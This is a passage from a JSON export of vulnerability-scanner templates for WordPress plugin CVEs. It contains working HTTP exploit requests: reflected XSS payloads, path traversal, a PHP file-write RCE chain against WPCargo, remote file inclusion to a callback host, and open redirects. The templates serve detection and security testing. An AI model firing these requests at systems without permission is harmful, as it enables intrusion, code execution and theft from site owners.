matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008def46061f092b5a0c93c28264ab3a05066eaf001fe4abf17f6bb797222530eb02206027d16ad6b375a0bf8611d8873cea6d30f23a2c433cfcf607ec748b470ffabc:922c64590222798bb761d5b6d8e72950", "hash": "783e523c89213dd0df2e799d835e41d9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082df" }, "name": "CVE-2021-24956.yaml", "content": "id: CVE-2021-24956\n\ninfo:\n name: Blog2Social < 6.8.7 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Fixed in version 6.8.7\n reference:\n - https://wpscan.com/vulnerability/5882ea89-f463-4f0b-a624-150bbaf967c2\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24956\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24956\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: adenion\n product: blog2social\n framework: wordpress\n tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan,adenion\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=blog2social&b2sShowByDate=\"> HTTP/1.1\n Host: {{Hostname}}\n\n 
matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\" name='\n - 'Your Activity'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ec04e3dad8ad65b066274ccd4a8a113b5ea1b447ef8a8ec31cda043e7556215b022048581b99f01c99ffc5343a1654aeb5b223cee073de6650038918f6053e24675b:922c64590222798bb761d5b6d8e72950", "hash": "09ef8b019cc1f7aa3916e4d4b26b40df", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e0" }, "name": "CVE-2021-24970.yaml", "content": "id: CVE-2021-24970\n\ninfo:\n name: WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion\n author: r3Y3r53\n severity: high\n description: |\n WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: Fixed in version 2.5.4.\n reference:\n - https://wpscan.com/vulnerability/9b15d47e-43b6-49a8-b2c3-b99c92101e10\n - https://wordpress.org/plugins/all-in-one-video-gallery\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24970\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2021-24970\n cwe-id: CWE-22\n epss-score: 0.03639\n epss-percentile: 0.90767\n cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: plugins360\n product: all-in-one_video_gallery\n framework: wordpress\n tags: cve2021,cve,wpscan,wp,wp-plugin,wordpress,lfi,authenticated,plugins360\n\nhttp:\n - raw:\n - |\n POST 
/wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"All-in-One Video Gallery\")'\n - 'contains(body_2, \"Hello world!\")'\n - 'contains(body_2, \"Welcome to WordPress\")'\n condition: and\n# digest: 4a0a00473045022100b5d1766bc6648351452ccabff49a901fdcee3d82c63473eb3f7da8360ad1a0f802201b2b426c71f82735e56341c6b3a49558a74a3e6d0a936e46a2d1c375a0d2dffc:922c64590222798bb761d5b6d8e72950", "hash": "38fe2c99f9ca7ca592ff720a7fa38bff", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e1" }, "name": "CVE-2021-24979.yaml", "content": "id: CVE-2021-24979\n\ninfo:\n name: Paid Memberships Pro < 2.6.6 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The Paid Memberships Pro WordPress plugin before 2.6.6 does not escape the s parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting\n remediation: version 2.6.6\n reference:\n - https://wpscan.com/vulnerability/fc011990-4ec1-4553-901d-4ff1f482cb79\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24979\n - https://plugins.trac.wordpress.org/changeset/2632369/paid-memberships-pro/tags/2.6.6/adminpages/discountcodes.php\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24979\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.40832\n cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: strangerstudios\n product: paid_memberships_pro\n framework: wordpress\n publicwww-query: /wp-content/plugins/paid-memberships-pro/\n 
tags: cve2021,cve,wp,wordpress,wpscan,wp-plugin,xss,authenticated,strangerstudios\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=pmpro-discountcodes&s=s\"+style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"style=animation-name:rotation+onanimationstart=alert(document.domain)//\")'\n - 'contains(body_2, \"Paid Memberships Pro - Membership Plugin for WordPress\")'\n condition: and\n# digest: 4a0a0047304502204c311ac0221f929a6e40782a29c695f3b9f8f53fdb8540c1a50f006d72c4665f022100bfbd6264919d48a0a9046f8c4b2fc16c812b6b9713d44a254f19dd0c43a97101:922c64590222798bb761d5b6d8e72950", "hash": "5ee2019e8ce057c112021a7371153c15", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e2" }, "name": "CVE-2021-24987.yaml", "content": "id: CVE-2021-24987\n\ninfo:\n name: WordPress Super Socializer <7.13.30 - Cross-Site Scripting\n author: Akincibor\n severity: medium\n description: WordPress Super Socializer plugin before 7.13.30 contains a reflected cross-site scripting vulnerability. 
It does not sanitize and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update to the latest version of the WordPress Super Socializer plugin (7.13.30 or higher) to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/a14b668f-812f-46ee-827e-0996b378f7f0\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24987\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24987\n cwe-id: CWE-79\n epss-score: 0.00086\n epss-percentile: 0.35299\n cpe: cpe:2.3:a:heateor:super_socializer:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: heateor\n product: super_socializer\n framework: wordpress\n tags: cve2021,cve,wpscan,xss,wp,wp-plugin,wordpress,heateor\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]='\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{\"facebook_urls\":[[\"\"]]'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022072d7507fe3f98f145bb0366d01ee315c4090c40e04ea184f4563ab190e401a7e022100c4dacb7acbb47c6a77145ea140e5e68f4bfb3a15cbbfca8f3fe70afdc48dbbb7:922c64590222798bb761d5b6d8e72950", "hash": "cb0a5af6a5ed4a1c5ef2472bdd982b93", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e3" }, "name": "CVE-2021-24991.yaml", "content": "id: CVE-2021-24991\n\ninfo:\n name: WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site 
Scripting\n author: cckuailong\n severity: medium\n description: The Wordpress plugin WooCommerce PDF Invoices & Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard.\n impact: |\n An attacker can exploit this vulnerability to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Update to the latest version of the WooCommerce PDF Invoices & Packing Slips WordPress Plugin (2.10.5 or higher) to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24991\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2021-24991\n cwe-id: CWE-79\n epss-score: 0.00069\n epss-percentile: 0.28508\n cpe: cpe:2.3:a:wpovernight:woocommerce_pdf_invoices\\&_packing_slips:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: wpovernight\n product: woocommerce_pdf_invoices\\&_packing_slips\n framework: wordpress\n tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan,wpovernight\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\\\" style=animation-name:rotation onanimationstart=alert(document.domain) x\"\n - 
\"WooCommerce PDF Invoices\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e3fab7e5665c508ed27c90a825ed1b062c712e2975095070c7bfa0db637630ac02201db7375a05fb52ce17611603b42d4dd1518cba8f7f15dc2bbb3988dd43a56062:922c64590222798bb761d5b6d8e72950", "hash": "f021ddc811746160d6b75c1792f0f66c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e4" }, "name": "CVE-2021-24997.yaml", "content": "id: CVE-2021-24997\n\ninfo:\n name: WordPress Guppy <=1.1 - Information Disclosure\n author: Evan Rubinstein\n severity: medium\n description: WordPress Guppy plugin through 1.1 is susceptible to an API disclosure vulnerability. This can allow an attacker to obtain all user IDs and then use them to make API requests to get messages sent between users and/or send messages posing as one user to another.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the target system.\n remediation: |\n Update to the latest version of the WordPress Guppy plugin (version >1.1) to mitigate the information disclosure vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/50540\n - https://patchstack.com/database/vulnerability/wp-guppy/wordpress-wp-guppy-plugin-1-2-sensitive-information-disclosure-vulnerability\n - https://wpscan.com/vulnerability/747e6c7e-a167-4d82-b6e6-9e8613f0e900\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24997\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-24997\n cwe-id: CWE-862\n epss-score: 0.0019\n epss-percentile: 0.55517\n cpe: cpe:2.3:a:wp-guppy:wp_guppy:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wp-guppy\n product: wp_guppy\n framework: wordpress\n tags: cve,cve2021,wordpress,guppy,api,wp-plugin,edb,wpscan,wp-guppy\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"guppyUsers\":'\n - '\"userId\":'\n - '\"type\":'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009940ed970e2fe98caebdb9000bae9afc4290524e778cb754f7a1bbab62a0cca5022100d07f577257ea8cd109f810bd9f0cbbe6a15f7c41569e27c4b31bec75455d0ce0:922c64590222798bb761d5b6d8e72950", "hash": "cb1b34773095cdccbb6ce2b2419aa588", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e5" }, "name": "CVE-2021-25003.yaml", "content": "id: CVE-2021-25003\n\ninfo:\n name: WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution\n author: theamanrawat\n severity: critical\n description: |\n WordPress WPCargo Track & Trace plugin before 6.9.0 is susceptible to remote code execution, The plugin contains a file which can allow an attacker to write a PHP file anywhere on the web server, leading to possible remote code execution. 
This can allow an attacker to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system.\n remediation: |\n Update to the latest version of the WPCargo Track & Trace plugin (6.9.0 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a\n - https://wordpress.org/plugins/wpcargo/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25003\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/WhooAmii/POC_to_review\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-25003\n cwe-id: CWE-434,CWE-94\n epss-score: 0.61252\n epss-percentile: 0.97725\n cpe: cpe:2.3:a:wptaskforce:wpcargo_track_\\&_trace:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: wptaskforce\n product: wpcargo_track_\\&_trace\n framework: wordpress\n tags: cve2021,cve,rce,wpcargo,unauth,wordpress,wp,wp-plugin,wpscan,intrusive,wptaskforce\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 2={{md5(num)}}\n\n matchers:\n - type: dsl\n dsl:\n - status_code_1 
!= 200\n - status_code_2 == 200\n - status_code_3 == 200\n - contains(body_3, md5(num))\n - contains(body_3, 'PNG')\n condition: and\n# digest: 4a0a00473045022100b5707ad91e6b1dfa5b4a3bc474d4742991a1d184ae0613aa6cb97d286b6dfc10022037152a98a4212c570ce5b27a05074e2caeefd10b0e48b23218d1d6956512453e:922c64590222798bb761d5b6d8e72950", "hash": "43b1f8f4b0f952775b7a3f50e8dc63f1", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e6" }, "name": "CVE-2021-25008.yaml", "content": "id: CVE-2021-25008\n\ninfo:\n name: The Code Snippets WordPress Plugin < 2.14.3 - Cross-Site Scripting\n author: cckuailong\n severity: medium\n description: The Wordpress plugin Code Snippets before 2.14.3 does not escape the snippets-safe-mode parameter before reflecting it in attributes, leading to a reflected cross-site scripting issue.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update the Code Snippets WordPress Plugin to version 2.14.3 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25008\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25008\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:codesnippets:code_snippets:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: codesnippets\n product: code_snippets\n framework: wordpress\n tags: cve,cve2021,authenticated,wpscan,xss,wp,wordpress,wp-plugin,codesnippets\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: 
wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\\\" style=animation-name:rotation onanimationstart=alert(document.domain) x\"\n - \"Snippets\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210080481e6e1ba1c67c11351890a405747b0082be4ba5d44bf5837a927a64705902022023a138df22ac6f0201daaf4656cb1c2ce449367c4251627cbf62327376b74bc5:922c64590222798bb761d5b6d8e72950", "hash": "5be4ca69451978c20574e5dd4b0a50bd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e7" }, "name": "CVE-2021-25016.yaml", "content": "id: CVE-2021-25016\n\ninfo:\n name: Chaty < 2.8.2 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.\n remediation: Fixed in 2.8.3\n reference:\n - https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25016\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25016\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: premio\n product: chaty\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/chaty/\"\n tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio\n\nhttp:\n - 
raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"search=\"\n - \"chaty_page_chaty\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200562d68182e1f0832f719f7ffcc7031dd943c79e8086641c3bf82c70789eb8f30220539f7c805bba5467372c8534f30dd6565b0ad9886177350366dca637604e7708:922c64590222798bb761d5b6d8e72950", "hash": "0faf725923d17a86a6fffe3c47b0e7b8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e8" }, "name": "CVE-2021-25028.yaml", "content": "id: CVE-2021-25028\n\ninfo:\n name: WordPress Event Tickets < 5.2.2 - Open Redirect\n author: dhiyaneshDk\n severity: medium\n description: WordPress Event Tickets < 5.2.2 is susceptible to an open redirect vulnerability. 
The plugin does not validate the tribe_tickets_redirect_to parameter before redirecting the user to the given value, leading to an arbitrary redirect issue.\n remediation: |\n Update to the latest version of the WordPress Event Tickets plugin (5.2.2 or higher) to fix the open redirect vulnerability.\n reference:\n - https://wpscan.com/vulnerability/80b0682e-2c3b-441b-9628-6462368e5fc7\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25028\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25028\n cwe-id: CWE-601\n epss-score: 0.00106\n epss-percentile: 0.42838\n cpe: cpe:2.3:a:tri:event_tickets:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: tri\n product: event_tickets\n framework: wordpress\n tags: cve2021,cve,wordpress,redirect,wp-plugin,eventtickets,wpscan,tri\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a004730450220523e42cccb15d399bfe1d8f4b00af72f0ccf7c7bd749ec772e31fa77690724b4022100bfbc6f0237c977b76922435c5442ce93f373946c65ea39d0dcb51f48c357a6d1:922c64590222798bb761d5b6d8e72950", "hash": "10bc89ad01e1948c825e80e53c2241df", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e9" }, "name": "CVE-2021-25033.yaml", "content": "id: CVE-2021-25033\n\ninfo:\n name: Noptin < 1.6.5 - Open Redirect\n author: dhiyaneshDk\n severity: medium\n description: Noptin < 1.6.5 is susceptible to an open redirect vulnerability. 
The plugin does not validate the \"to\" parameter before redirecting the user to its given value, leading to an open redirect issue.\n impact: |\n An attacker can trick users into visiting malicious websites, leading to phishing attacks.\n remediation: |\n Update to Noptin plugin version 1.6.5 or later.\n reference:\n - https://wpscan.com/vulnerability/c2d2384c-41b9-4aaf-b918-c1cfda58af5c\n - https://plugins.trac.wordpress.org/changeset/2639592\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25033\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25033\n cwe-id: CWE-601\n epss-score: 0.001\n epss-percentile: 0.40139\n cpe: cpe:2.3:a:noptin:noptin:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: noptin\n product: noptin\n framework: wordpress\n tags: cve2021,cve,wp,wpscan,wordpress,redirect,wp-plugin,noptin\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a00473045022012084f97047c7ac54d9935c917e356d3e8cc4cf7d1eb64fe16de01ea652b7ca9022100e2abc8461b032fe559fe1bd613aada42533b08c6dc4a843581c08b25e83f2b25:922c64590222798bb761d5b6d8e72950", "hash": "cdfbb52d74c476f670c6cf2f928de1d6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ea" }, "name": "CVE-2021-25052.yaml", "content": "id: CVE-2021-25052\n\ninfo:\n name: WordPress Button Generator <2.3.3 - Remote File Inclusion\n author: cckuailong\n severity: high\n description: WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to 
cross-site request forgery and remote code execution.\n impact: |\n An attacker can exploit this vulnerability to execute arbitrary code on the target system.\n remediation: |\n Update to the latest version of the WordPress Button Generator plugin (2.3.3) to fix the remote file inclusion vulnerability.\n reference:\n - https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25052\n - https://plugins.trac.wordpress.org/changeset/2641639/button-generation\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-25052\n cwe-id: CWE-352\n epss-score: 0.01998\n epss-percentile: 0.88568\n cpe: cpe:2.3:a:wow-company:button_generator:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: wow-company\n product: button_generator\n framework: wordpress\n tags: cve2021,cve,wp-plugin,authenticated,wpscan,rfi,wp,wordpress,wow-company\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n name: \"http\"\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205262ea4dab221e3963ad7f92b32d9b9dad85dfa63eb43144b4d17fb5dfd2371a0220423122b10f03da727e631455d4cd3c7d6adc8f94bd6bf9e89525bf11bdfa97b1:922c64590222798bb761d5b6d8e72950", "hash": "21d5b52fb053ed4d3349a321d81400ea", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082eb" }, "name": "CVE-2021-25055.yaml", "content": "id: CVE-2021-25055\n\ninfo:\n 
name: WordPress FeedWordPress < 2022.0123 - Authenticated Cross-Site Scripting\n author: DhiyaneshDK\n severity: medium\n description: |\n The plugin is affected by a cross-site scripting vulnerability within the \"visibility\" parameter.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data theft, and potential compromise of the affected WordPress website.\n remediation: |\n Update to the latest version of the FeedWordPress plugin (version 2022.0123 or higher) to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25055\n - https://plugins.trac.wordpress.org/changeset/2662665\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25055\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.40139\n cpe: cpe:2.3:a:feedwordpress_project:feedwordpress:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: feedwordpress_project\n product: feedwordpress\n framework: wordpress\n tags: cve2021,cve,wordpress,xss,wp-plugin,authenticated,wpscan,feedwordpress_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: 